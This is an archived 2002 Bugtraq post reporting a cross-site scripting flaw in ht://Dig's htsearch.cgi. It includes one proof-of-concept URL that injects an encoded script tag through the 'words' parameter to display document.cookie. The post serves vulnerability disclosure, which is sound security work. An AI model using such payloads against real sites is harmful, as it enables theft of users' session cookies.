XSS in HTDIG

From: Howard Yeend (h_bugtraqat_private)
Date: Wed Jun 26 2002 - 01:38:48 PDT

Next message: Markus Friedl: "Revised OpenSSH Security Advisory (adv.iss)"

Previous message: Markus Friedl: "OpenSSH Security Advisory (adv.iss)"
Next in thread: Peter Watkins: "Re: XSS in HTDIG"
Reply: Peter Watkins: "Re: XSS in HTDIG"
Reply: webmaster (Stephen Ostermiller): "Re: XSS in HTDIG"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Eg;

http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

(all URLS must be on one line)

Apologies if this is a known issue.
Apologies also for posting about XSS, too, but
this is not an isolated website, but a commonly
used service.

=====
-----BEGIN GEEK CODE BLOCK-----
  Version: 3.1 www.geekcode.com
GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D-(Quake+++) G+++ e* h r++>+++ y+(+++)
-----END GEEK CODE BLOCK-----

__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com

Next message: Markus Friedl: "Revised OpenSSH Security Advisory (adv.iss)"
Previous message: Markus Friedl: "OpenSSH Security Advisory (adv.iss)"
Next in thread: Peter Watkins: "Re: XSS in HTDIG"
Reply: Peter Watkins: "Re: XSS in HTDIG"
Reply: webmaster (Stephen Ostermiller): "Re: XSS in HTDIG"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 22:13:15 PDT